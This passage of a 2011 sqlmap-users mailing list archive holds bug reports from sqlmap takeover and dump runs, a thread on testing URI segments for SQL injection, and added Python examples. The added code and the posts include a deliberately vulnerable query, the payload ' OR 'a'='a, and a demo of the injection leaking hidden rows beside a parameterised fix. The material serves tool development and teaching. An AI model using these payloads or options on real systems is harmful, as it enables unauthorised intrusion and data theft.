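    print(f"{len(dumped)}/{expected} rows, complete={complete}, oracle requests={requests}")
```

The request counter makes the cost of the technique visible: one MIN() per row plus one terminating MIN(), plus one query per non-pivot column per row, so a table with N rows and two extra columns costs 3N + 1 oracle queries before the single COUNT(*) check. The thread's 32-of-10,000 result would have tripped `complete == False` immediately, which is the practical reason to run --count alongside --dump.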
From: Andrew G. <and...@up...> - 2011-04-29 21:48:37

[23:46:20] [WARNING] unknown web page charset 'hungarian-iso-8859-2'. Please report by e-mail
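Both "unknown charset" reports on this page ('is0-8859-1' above and 'hungarian-iso-8859-2' here) are Content-Type labels that are not valid codec names. The following added example, which is not the fix committed to sqlmap, shows one way a client can normalise such labels before decoding a response instead of aborting: the rewrite rules are my own heuristics (assumptions), the fallback is UTF-8 with replacement characters, and the sample bytes are constructed Hungarian text in ISO-8859-2.

```python
"""Normalise sloppy Content-Type charset labels before decoding a response.

Added example, not the fix committed to sqlmap. The rewrite rules are my own
heuristics (assumptions); anything still unknown falls back to UTF-8 with
replacement characters rather than aborting the run.
"""
import codecs
import re
from typing import List, Optional, Pattern, Tuple

# Ordered cleanup rules applied to the lower-cased label (constructed list).
_RULES: List[Tuple[Pattern[str], str]] = [
    (re.compile(r"^[a-z]+-(?=iso-?8859)"), ""),     # 'hungarian-iso-8859-2' -> 'iso-8859-2'
    (re.compile(r"^is0"), "iso"),                    # 'is0-8859-1' -> 'iso-8859-1' (zero typo)
    (re.compile(r"^iso(?=\d)"), "iso-"),             # 'iso8859-1' -> 'iso-8859-1'
    (re.compile(r"^win(dows)?[-_]?(?=\d)"), "cp"),   # 'windows-1250' -> 'cp1250'
    (re.compile(r"^utf[-_]?(?=\d)"), "utf-"),        # 'utf8' -> 'utf-8'
]

_CHARSET_RE = re.compile(r"charset\s*=\s*[\"']?([\w.:-]+)", re.I)


def charset_from_content_type(header: str) -> Optional[str]:
    """Pull the raw charset token out of a Content-Type value, if any."""
    m = _CHARSET_RE.search(header)
    return m.group(1) if m else None


def normalize_charset(label: Optional[str], default: str = "utf-8") -> str:
    """Map a possibly malformed label to a canonical Python codec name."""
    if not label:
        return default
    name = label.strip().strip("\"'").lower()
    for pattern, repl in _RULES:
        name = pattern.sub(repl, name)
    try:
        return codecs.lookup(name).name      # e.g. 'iso8859-2', 'cp1250', 'utf-8'
    except LookupError:
        return default                       # unknown even after cleanup


def decode_body(body: bytes, content_type: str) -> str:
    """Decode a response body using the normalised charset; never raises on bad labels."""
    encoding = normalize_charset(charset_from_content_type(content_type))
    return body.decode(encoding, errors="replace")


if __name__ == "__main__":
    # Constructed sample: 'árvíztűrő' in ISO-8859-2 under the label from the thread.
    print(decode_body(b"\xe1rv\xedzt\xfbr\xf5", "text/html; charset=hungarian-iso-8859-2"))
```

The design choice worth noting is the order of failure handling: rules are applied first, `codecs.lookup()` is the arbiter of what counts as a valid codec, and only then does the default kick in. Decoding with the wrong 8-bit codec silently corrupts non-ASCII characters (the sample bytes read as "árvíztûrõ" under ISO-8859-1), which is why the fallback is a last resort and not the first choice.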
From: Miroslav S. <mir...@gm...> - 2011-04-29 16:56:15

hi Ahmed

thank you again for reporting. find it fixed in the latest commit (r3781).

kr

On Mon, Apr 25, 2011 at 10:58 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Ahmed.
>
> Thanks for reporting.
>
> This will be fixed at the end of the week. It requires overwriting of some poorly written system methods.
>
> Sending from Bernardo's place in London :)
>
> KR
> On Monday, April 25, 2011, Bernardo Damele A. G. <ber...@gm...> wrote:
>> What is the language of the web application? Can you provide us privately with full output of -v 3 --flush-session please?
>>
>> Bernardo
>>
>> On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote:
>>> it based uploading shell with the latest revision (r3770) but here is another issue
>>>
>>> [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev (r3770)
>>> Python version: 2.7
>>> Operating system: posix
>>> Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
>>> Technique: UNION
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>>   File "./sqlmap.py", line 83, in main
>>>     start()
>>>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
>>>     action()
>>>   File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
>>>     conf.dbmsHandler.osPwn()
>>>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in osPwn
>>>     self.uploadShellcodeexec(web=web)
>>>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in uploadShellcodeexec
>>>     self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
>>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
>>>     retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
>>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
>>>     page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
>>>   File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
>>>     conn = multipartOpener.open(url, multipart)
>>>   File "/usr/lib/python2.7/urllib2.py", line 391, in open
>>>     response = self._open(req, data)
>>>   File "/usr/lib/python2.7/urllib2.py", line 409, in _open
>>>     '_open', req)
>>>   File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
>>>     result = func(*args)
>>>   File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
>>>     return self.do_open(httplib.HTTPConnection, req)
>>>   File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
>>>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>>>   File "/usr/lib/python2.7/httplib.py", line 946, in request
>>>     self._send_request(method, url, body, headers)
>>>   File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
>>>     self.endheaders(body)
>>>   File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
>>>     self._send_output(message_body)
>>>   File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
>>>     msg += message_body
>>> UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: ordinal not in range(128)
>>>
>>> [*] shutting down at: 10:30:07
>>>
>>> On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote:
>>>>
>>>> there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
>>>> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: 0x05F5A30F
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-04-29 14:33:19

hi Jacco.

could you please retry with the latest revision and report back the results? an update (r3778) has been committed this moment regarding this bug report.

kr

On Wed, Apr 27, 2011 at 11:49 AM, Jacco van Tuijl <jac...@gm...> wrote:
> [11:08:16] [WARNING] HTTP error codes detected during testing:
> 403 (Forbidden) - 11 times, 500 (Internal Server Error) - 6103 times
>
> [11:08:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r3770)
> Python version: 2.7.1
> Operating system: nt
> Command line: sqlmap.py -u ********************************************************************************* --dump-all --random-agent --proxy=http://127.0.0.1:8118 --check-payload
> Technique: UNION
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 83, in main
>     start()
>   File "C:\sqlmap-0.9\lib\controller\controller.py", line 485, in start
>     action()
>   File "C:\sqlmap-0.9\lib\controller\action.py", line 106, in action
>     conf.dbmsHandler.dumpAll()
>   File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1525, in dumpAll
>     data = self.dumpTable()
>   File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1337, in dumpTable
>     entries = zip(*[entries[colName] for colName in colList])
> KeyError: u'Synonym'

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 23:58:15
|
Hi,

On 26 April 2011 04:00, David Guimaraes <sk...@gm...> wrote:
> How about a --count switch? To count the number of rows (like sqlsus do)...
> and what about column enumerator without setting some table(-T) or DB (-D)?

The "column enumerator" is implemented as of r3776. Use either switch --schema or --columns with no -T.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 20:53:09
|
Since nobody showed up, we ate and drank on your donations ourselves, thanks donors! ;)

By the way, Miroslav and I came up with lots of ideas for sqlmap 1.0 - we proved once again that real life brainstorming is way quicker and easier. We have many planned features, enhancements and code adjustments on the way!

Cheers,
Bernardo

On 26 April 2011 09:07, Bernardo Damele A. G. <ber...@gm...> wrote:
> Thank you guys for your donations. We will drink for you tonight!
>
> Hope to see someone joining us, drinks are on us and remember that the
> pub has a good deal for wine bottles on Tuesdays ;)
>
> Cheers,
> Bernardo Damele A. G.
>
> This message was sent from a smartphone
>
> On 25 Apr 2011, at 19:24, "ja...@ev..." <ja...@ev...> wrote:
>
>> Well, I'm trying to get my buddy Bert to go buy them a pint on me. We'll
>> see if he actually does it.
>>
>> On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...>
>> wrote:
>>> Which is exactly why I donated to SQLMap last night :). I suggest you
>>> do the same, because like you said - they freakin made SQLMap!
>>>
>>> Ryan
>>>
>>> ----- Original Message -----
>>> From: ja...@ev...
>>> To: sql...@li...
>>> Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern
>>> Subject: Re: [sqlmap-users] meet up in London
>>>
>>> Not even one person? You guys are dicks.
>>> Buy them some pints, they made sqlmap!
>>>
>>> -james
>>>
>>> On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham
>>> <ste...@gm...> wrote:
>>>> Miroslav Stampar wrote:
>>>>> So nobody is willing to have a drink with us :(
>>>>> We are both in London few more days so if you change your mind just reply.
>>>>>
>>>>> Kr
>>>>
>>>> If it makes you feel better, if I was single and didn't have to justify
>>>> the cost of the plane ticket from the US, I'd totally be there ;-)
>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 20:45:36
|
Hi,

We have created a Twitter account, @sqlmap[1]. Miroslav and I will post periodic updates about the progress of the project so that users not subscribed to this mailing list and not familiar with svn log[2] also get a feeling of what is going on under the hood. Also, Twitter statuses now load into the News paragraph of the homepage too.

Feel free to follow it - retweets are welcome!

[1] https://twitter.com/sqlmap
[2] http://svnbook.red-bean.com/en/1.5/svn.ref.svn.c.log.html

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 18:23:50
|
Andres,

On 28 Apr 2011, at 13:53, "Andres Tarascó Acuña" <ata...@gm...> wrote:
> Thanks David!
>
> so, to test several URI segments, i probably need to use something like:
>
> ./sqlmap.py -u http://host/path/chunk1*/chunk2* --data="postparameter=foo"
>
> is that right?

Yes.

> what should i type into the "-p" parameter to check sql injections only
> against chunk2 (instead of attacking "postparameter")?

-p does not support URI "parameters". Run sqlmap with no -p and ctrl+c when the detection phase starts against the post data - you will be prompted with a few options, skip to the next parameter is what you need, till sqlmap hits the URI snippet.

Bernardo Damele A. G.

This message was sent from a smartphone

> Thanks
>
> Andres
>
> 2011/4/28 Bernardo Damele A. G. <ber...@gm...>
>> Indeed, thanks David for replying.
>> I will update the user's manual with this feature at some point like
>> someone else pointed out.
>>
>> Cheers,
>> Bernardo Damele A. G.
>>
>> This message was sent from a smartphone
>>
>> On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote:
>>
>> Use * character at param value:
>>
>> http://vulnsite.com/vulnscript/1*/2
>>
>> 2011/4/28 Andres Tarascó Acuña <ata...@gm...>
>>
>>> Hello,
>>>
>>> I'm new to the list so probably I'm going to ask for something that was
>>> previously discussed. Anyway, I'm going to try :)
>>>
>>> I wish to know if there are plans to support "URI sql injection" in the
>>> near future. By URI injection i mean testing for sql injections on the URI
>>> instead of attacking GET/POST/cookie parameters. I see at least 3 scenarios
>>> where this feature should be required.
>>>
>>> 1- It's necessary to test URI segments when a web application is developed
>>> with frameworks like codeigniter, that disables GET parameters by default,
>>> and forces some parameters to be retrieved from the URI, like
>>> http://host/class/method/value1/value2.
>>>
>>> The following snippet is an example of a vulnerable application that is
>>> accessed as http://host/news/show/1
>>>
>>> class news extends CI_Controller {
>>>     function show($id, $param2) {
>>>         //do stuff..
>>>         $sql="select * from table where column='".$id."'";
>>>         $this->db->query($sql);
>>>         //....
>>>     }
>>> }
>>>
>>> On this scenario the attack should be performed against 'param1' for
>>> example: http://host/news/show/param1'+OR+'a'='a/param2
>>> The id parameter is manipulable however as far as i know its not supported
>>> by default by sqlmap as a testable parameter.
>>>
>>> 2- It's also required when testing websites for sqlinjections and an URL
>>> rewrite module is enabled, causing that parameter names are hidden to the
>>> user
>>>
>>> 3- When the URI is not sanitized and is stored into a database for logging
>>> purposes (therefore the application becomes vulnerable at least to blind
>>> timing sql attacks).
>>>
>>> Thanks in advance,
>>>
>>> Andres Tarasco
>>> http://www.tarasco.org/security
>>
>
|
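An added example, written for this archive page and not taken from sqlmap or from any poster, that illustrates the two points in the reply above: a `*` marker turns a path segment into a testable injection point, while `-p` only has named parameters in the query string to refer to. The function names (`marked_segments`, `expand_uri_markers`, `query_parameter_names`), the one-test-URL-per-marker expansion and the sample URL are assumptions made for the illustration; sqlmap's own marker handling is not reproduced here.

```python
"""
Added example (not sqlmap's code): expanding '*' injection markers in a URL
path and showing why '-p' cannot name a path segment.

Assumed for this illustration: the marker character, the helper names, and
the constructed sample URL in the shape discussed on the list.
"""
from urllib.parse import parse_qs, quote, urlsplit

MARKER = "*"  # the character sqlmap accepts after a value to mark it for testing


def marked_segments(url):
    """Split the URL path into (value, is_marked) pairs.

    A segment ending in '*' is marked; the '*' itself is not part of the value
    that will be sent to the server.
    """
    parts = urlsplit(url)
    segments = []
    for seg in parts.path.split("/"):
        if seg.endswith(MARKER):
            segments.append((seg[:-1], True))
        else:
            segments.append((seg, False))
    return parts, segments


def expand_uri_markers(url, payload):
    """Return [(segment_index, test_url), ...], one entry per marked segment.

    Each test URL appends the payload to exactly one marked segment and sends
    every other segment with its plain value, mirroring testing one injection
    point at a time. The payload is percent-encoded with no safe characters so
    that a '/' or a space inside it cannot create or split path segments.
    """
    parts, segments = marked_segments(url)
    tests = []
    for idx, (value, marked) in enumerate(segments):
        if not marked:
            continue
        new_path = "/".join(
            (v + quote(payload, safe="")) if i == idx else v
            for i, (v, _) in enumerate(segments)
        )
        tests.append((idx, parts._replace(path=new_path).geturl()))
    return tests


def query_parameter_names(url):
    """Names a '-p'-style selector could refer to: only the query string has them.

    A path such as /news/show/1 carries no parameter names at all, which is
    why the marker approach is needed for URI segments.
    """
    return sorted(parse_qs(urlsplit(url).query).keys())


if __name__ == "__main__":
    # Constructed URL: two marked path segments plus, for contrast, one
    # ordinary GET parameter.
    url = "http://host/path/chunk1*/chunk2*?debug=0"
    for idx, test_url in expand_uri_markers(url, "' OR 'a'='a"):
        print(idx, test_url)
    print("named parameters:", query_parameter_names(url))
```

Running it prints one request URL per marker with the payload encoded into that segment and the other marker's segment sent untouched, and lists only `debug` as a named parameter; the path segments never appear in that list.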
From: Andres T. A. <ata...@gm...> - 2011-04-28 12:53:41
|
Thanks David!

so, to test several URI segments, i probably need to use something like:

./sqlmap.py -u http://host/path/chunk1*/chunk2* --data="postparameter=foo"

is that right?

what should i type into the "-p" parameter to check sql injections only
against chunk2 (instead of attacking "postparameter")?

Thanks

Andres

2011/4/28 Bernardo Damele A. G. <ber...@gm...>
> Indeed, thanks David for replying.
> I will update the user's manual with this feature at some point like
> someone else pointed out.
>
> Cheers,
> Bernardo Damele A. G.
>
> This message was sent from a smartphone
>
> On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote:
>
> Use * character at param value:
>
> http://vulnsite.com/vulnscript/1*/2
>
> 2011/4/28 Andres Tarascó Acuña <ata...@gm...>
>
>> Hello,
>>
>> I'm new to the list so probably I'm going to ask for something that was
>> previously discussed. Anyway, I'm going to try :)
>>
>> I wish to know if there are plans to support "URI sql injection" in the
>> near future. By URI injection i mean testing for sql injections on the URI
>> instead of attacking GET/POST/cookie parameters. I see at least 3 scenarios
>> where this feature should be required.
>>
>> 1- It's necessary to test URI segments when a web application is developed
>> with frameworks like codeigniter, that disables GET parameters by default,
>> and forces some parameters to be retrieved from the URI, like
>> http://host/class/method/value1/value2.
>>
>> The following snippet is an example of a vulnerable application that is
>> accessed as http://host/news/show/1
>>
>> class news extends CI_Controller {
>>     function show($id, $param2) {
>>         //do stuff..
>>         $sql="select * from table where column='".$id."'";
>>         $this->db->query($sql);
>>         //....
>>     }
>> }
>>
>> On this scenario the attack should be performed against 'param1' for
>> example: http://host/news/show/param1'+OR+'a'='a/param2
>> The id parameter is manipulable however as far as i know its not supported
>> by default by sqlmap as a testable parameter.
>>
>> 2- It's also required when testing websites for sqlinjections and an URL
>> rewrite module is enabled, causing that parameter names are hidden to the
>> user
>>
>> 3- When the URI is not sanitized and is stored into a database for logging
>> purposes (therefore the application becomes vulnerable at least to blind
>> timing sql attacks).
>>
>> Thanks in advance,
>>
>> Andres Tarasco
>> http://www.tarasco.org/security
>
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 12:44:01
|
Indeed, thanks David for replying.
I will update the user's manual with this feature at some point like someone else pointed out.

Cheers,
Bernardo Damele A. G.

This message was sent from a smartphone

On 28 Apr 2011, at 13:33, David Guimaraes <sk...@gm...> wrote:

> Use * character at param value:
>
> http://vulnsite.com/vulnscript/1*/2
>
> 2011/4/28 Andres Tarascó Acuña <ata...@gm...>
>> Hello,
>>
>> I'm new to the list so probably I'm going to ask for something that was
>> previously discussed. Anyway, I'm going to try :)
>>
>> I wish to know if there are plans to support "URI sql injection" in the
>> near future. By URI injection i mean testing for sql injections on the URI
>> instead of attacking GET/POST/cookie parameters. I see at least 3 scenarios
>> where this feature should be required.
>>
>> 1- It's necessary to test URI segments when a web application is developed
>> with frameworks like codeigniter, that disables GET parameters by default,
>> and forces some parameters to be retrieved from the URI, like
>> http://host/class/method/value1/value2.
>>
>> The following snippet is an example of a vulnerable application that is
>> accessed as http://host/news/show/1
>>
>> class news extends CI_Controller {
>>     function show($id, $param2) {
>>         //do stuff..
>>         $sql="select * from table where column='".$id."'";
>>         $this->db->query($sql);
>>         //....
>>     }
>> }
>>
>> On this scenario the attack should be performed against 'param1' for
>> example: http://host/news/show/param1'+OR+'a'='a/param2
>> The id parameter is manipulable however as far as i know its not supported
>> by default by sqlmap as a testable parameter.
>>
>> 2- It's also required when testing websites for sqlinjections and an URL
>> rewrite module is enabled, causing that parameter names are hidden to the
>> user
>>
>> 3- When the URI is not sanitized and is stored into a database for logging
>> purposes (therefore the application becomes vulnerable at least to blind
>> timing sql attacks).
>>
>> Thanks in advance,
>>
>> Andres Tarasco
>> http://www.tarasco.org/security
>
|
From: David G. <sk...@gm...> - 2011-04-28 12:32:39
|
Use * character at param value:

http://vulnsite.com/vulnscript/1*/2

2011/4/28 Andres Tarascó Acuña <ata...@gm...>
> Hello,
>
> I'm new to the list so probably I'm going to ask for something that was
> previously discussed. Anyway, I'm going to try :)
>
> I wish to know if there are plans to support "URI sql injection" in the
> near future. By URI injection i mean testing for sql injections on the URI
> instead of attacking GET/POST/cookie parameters. I see at least 3 scenarios
> where this feature should be required.
>
> 1- It's necessary to test URI segments when a web application is developed
> with frameworks like codeigniter, that disables GET parameters by default,
> and forces some parameters to be retrieved from the URI, like
> http://host/class/method/value1/value2.
>
> The following snippet is an example of a vulnerable application that is
> accessed as http://host/news/show/1
>
> class news extends CI_Controller {
>     function show($id, $param2) {
>         //do stuff..
>         $sql="select * from table where column='".$id."'";
>         $this->db->query($sql);
>         //....
>     }
> }
>
> On this scenario the attack should be performed against 'param1' for
> example: http://host/news/show/param1'+OR+'a'='a/param2
> The id parameter is manipulable however as far as i know its not supported
> by default by sqlmap as a testable parameter.
>
> 2- It's also required when testing websites for sqlinjections and an URL
> rewrite module is enabled, causing that parameter names are hidden to the
> user
>
> 3- When the URI is not sanitized and is stored into a database for logging
> purposes (therefore the application becomes vulnerable at least to blind
> timing sql attacks).
>
> Thanks in advance,
>
> Andres Tarasco
> http://www.tarasco.org/security
>
|
From: Andres T. A. <ata...@gm...> - 2011-04-28 12:05:42
|
Hello,

I'm new to the list so probably I'm going to ask for something that was previously discussed. Anyway, I'm going to try :)

I wish to know if there are plans to support "URI sql injection" in the near future. By URI injection i mean testing for sql injections on the URI instead of attacking GET/POST/cookie parameters. I see at least 3 scenarios where this feature should be required.

1- It's necessary to test URI segments when a web application is developed with frameworks like codeigniter, that disables GET parameters by default, and forces some parameters to be retrieved from the URI, like http://host/class/method/value1/value2.

The following snippet is an example of a vulnerable application that is accessed as http://host/news/show/1

class news extends CI_Controller {
    function show($id, $param2) {
        //do stuff..
        $sql="select * from table where column='".$id."'";
        $this->db->query($sql);
        //....
    }
}

On this scenario the attack should be performed against 'param1' for example: http://host/news/show/param1'+OR+'a'='a/param2
The id parameter is manipulable however as far as i know its not supported by default by sqlmap as a testable parameter.

2- It's also required when testing websites for sqlinjections and an URL rewrite module is enabled, causing that parameter names are hidden to the user

3- When the URI is not sanitized and is stored into a database for logging purposes (therefore the application becomes vulnerable at least to blind timing sql attacks).

Thanks in advance,

Andres Tarasco
http://www.tarasco.org/security
|
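An added example, not the poster's code and not CodeIgniter's: a Python re-creation of the route in scenario 1, run against an in-memory SQLite table, showing how a URI segment reaches the query as SQL text and what the same segment does once it is passed as a bound parameter instead. The table, its rows, the extra `published=1` restriction (added so the bypass is visible), the `%`-encoded request path and the function names `route_segment`, `show_vulnerable` and `show_fixed` are all constructed for this illustration.

```python
"""
Added example (not the poster's code): the URI-segment injection from the
CodeIgniter snippet above, re-created in Python over SQLite.

Constructed for this illustration: the 'news' table and its rows, the
published=1 filter, and the request paths used below.
"""
import sqlite3
from urllib.parse import unquote


def make_db():
    """In-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [
            (1, "public story", 1),
            (2, "draft story", 0),      # must never be returned to a visitor
            (3, "another public story", 1),
        ],
    )
    return conn


def route_segment(path, position):
    """Return the URI segment a /class/method/value router hands to the method.

    The router splits on '/', so a payload must not contain a raw '/';
    percent-decoding happens before the value reaches the controller.
    """
    return unquote(path.strip("/").split("/")[position])


def show_vulnerable(conn, id_value):
    """String concatenation, as in the posted snippet: the segment becomes SQL.

    With id_value = "1' OR 'a'='a" the WHERE clause turns into
    published=1 AND id='1' OR 'a'='a', and the OR disables the filter.
    """
    sql = "SELECT id, title FROM news WHERE published=1 AND id='" + id_value + "'"
    return conn.execute(sql).fetchall()


def show_fixed(conn, id_value):
    """Query binding: the segment is data, compared to id as a whole value."""
    sql = "SELECT id, title FROM news WHERE published=1 AND id=?"
    return conn.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    normal = route_segment("/news/show/1", 2)
    # "1' OR 'a'='a" percent-encoded as it would travel in the request line
    attack = route_segment("/news/show/1%27%20OR%20%27a%27%3D%27a", 2)
    print("normal, vulnerable:", show_vulnerable(conn, normal))
    print("attack, vulnerable:", show_vulnerable(conn, attack))   # draft leaks
    print("attack, fixed:     ", show_fixed(conn, attack))        # no rows
```

The concatenated query returns every row, including the unpublished one, for the injected segment; the bound version returns nothing for it, because the whole segment is compared to `id` as a single value, and both behave identically for a legitimate `1`.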